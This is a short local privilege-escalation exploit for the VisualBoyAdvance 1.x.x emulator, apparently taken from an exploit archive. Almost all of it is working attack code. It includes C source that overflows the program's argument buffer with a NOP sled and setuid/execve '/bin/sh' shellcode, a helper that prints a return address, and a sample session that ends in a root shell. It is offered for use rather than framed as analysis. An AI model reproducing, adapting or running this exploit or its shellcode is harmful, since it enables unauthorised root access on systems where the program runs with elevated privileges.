Local exploit for VisualBoyAdvanced 1.x.x that is not normally setuid by default.
d7ad5d10ae68304f60fa8c23e1079b962f6c7588e14d261ff18c554610bcac6c
/*
VisualBoyAdvanced 1.x.x local Shell Exploit by Qnix (q-nix[at]hotmail.com)
Example :
[root@Qnix exp]# ls V* exp*c ret*c ret exp
exp ret.c VisualBoyAdvance.cfg
exp.c VisualBoyAdvance
ret VisualBoyAdvance-1.7.1-SDL-linux-glibc22.tar.gz
[root@Qnix exp]# ./exp
Segmentation fault
[root@Qnix exp]# ./ret
-1073745328
[root@Qnix exp]# ./exp -1073745328
VisualBoyAdvance-SDL version 1.7.1
Linux version
Seaching for file VisualBoyAdvance.cfg
Searching current dir: /root/tools/exp
Reading configuration file.
sh-3.00# :)
exp.c
**/
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
int main(int argc,char *argv[])
{
char buffer[2300];
int i,x;
long *ptr = (long *) buffer;
for(i=0 ; i < 570 ; i++)
*(ptr + i) = atoi(argv[1]);
for(i=0 ; i < 1900 ; i++)
buffer[i] = '\x90';
for(x=0 ; x < strlen(shellcode) ; x++ )
buffer[i++] = shellcode[x];
execl("./VisualBoyAdvance","VisualBoyAdvance",buffer,0);
return 0;
}
/*
ret.c
#include<stdio.h>
int main(void)
{
int i;
printf("%d\n",0xbffff250);
return 0;
}
*/